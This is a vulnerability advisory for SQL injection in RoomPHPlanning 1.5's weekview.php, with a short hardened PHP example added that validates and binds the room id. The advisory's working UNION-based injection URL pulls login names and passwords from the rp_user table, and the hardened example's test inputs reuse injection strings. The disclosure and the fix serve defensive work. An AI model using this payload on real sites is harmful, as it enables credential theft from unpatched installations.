#######################################################################################
#                                                                                     #
#  ...::::RoomPHPlanning((weekview.php)) 1.5 SQL Injection Vulnerabilities ::::...    #
#######################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discovered By: virangar security team (hadihadi)

special tnx to: MR.nosrati, black.shadowes, MR.hesy, Zahra

& all virangar members & all hackerz

greetz: to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal)
-----
-------vuln codes in:-----------
weekview.php:

@$idroom = $_GET['idroom'];
....
line 47:$qry = "SELECT NameRm, BkcolRm, FtcolRm ".
"FROM ".ROOM." WHERE IdRm=".$idroom ;
---
exploit:
http://site.com/weekview.php?idroom=-999/**/union/**/select/**/concat(LoginUs,0x3a,char(58),PwdUs),2,3/**/from/**/rp_user/**/where/**/IdRk=1/*
---
young iranian h4ck3rz
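
-------hardened form (added example):-----------
The query at line 47 concatenates the raw idroom request value into the SQL text. The block below is an added example, not code from RoomPHPlanning or from the advisory authors: it validates idroom as a positive integer and binds it as a parameter. The PDO handle, the function names, the 'rp_room' value given to ROOM and the in-memory SQLite demo data are assumptions made so the example runs on its own.

```php
<?php
// Added example, not RoomPHPlanning's code: validated, parameterized form of the
// weekview.php room lookup. PDO and the ROOM value are assumptions.
declare(strict_types=1);

if (!defined('ROOM')) {
    define('ROOM', 'rp_room'); // placeholder table name (assumption)
}

// Accept only a plain positive decimal id; anything else yields null.
function parse_room_id($raw): ?int
{
    if (!is_string($raw) || !preg_match('/\A[1-9][0-9]{0,8}\z/', $raw)) {
        return null;
    }
    return (int) $raw;
}

// The id is bound as an integer parameter, never concatenated into the SQL text.
// ROOM is a configuration constant, not request data.
function fetch_room(PDO $db, int $idroom): ?array
{
    $stmt = $db->prepare(
        'SELECT NameRm, BkcolRm, FtcolRm FROM ' . ROOM . ' WHERE IdRm = :id'
    );
    $stmt->bindValue(':id', $idroom, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ' . ROOM . ' (IdRm INTEGER PRIMARY KEY, NameRm TEXT, BkcolRm TEXT, FtcolRm TEXT)');
$db->exec('INSERT INTO ' . ROOM . " VALUES (1, 'Room A', '#ffffff', '#000000')");

// Constructed inputs: one valid id, then values the original code would
// have pasted straight into the query.
$samples = ['1', '-999/**/union/**/select/**/1,2,3', '1 OR 1=1', '', null];
foreach ($samples as $raw) {
    $id = parse_room_id($raw);
    $room = $id === null ? null : fetch_room($db, $id);
    $shown = var_export($raw, true);
    echo str_pad($shown, 40), ' => ', $room === null ? 'rejected or not found' : $room['NameRm'], "\n";
}
```

When the backend is MySQL, setting PDO::ATTR_EMULATE_PREPARES to false makes PDO use server-side prepared statements instead of client-side emulation.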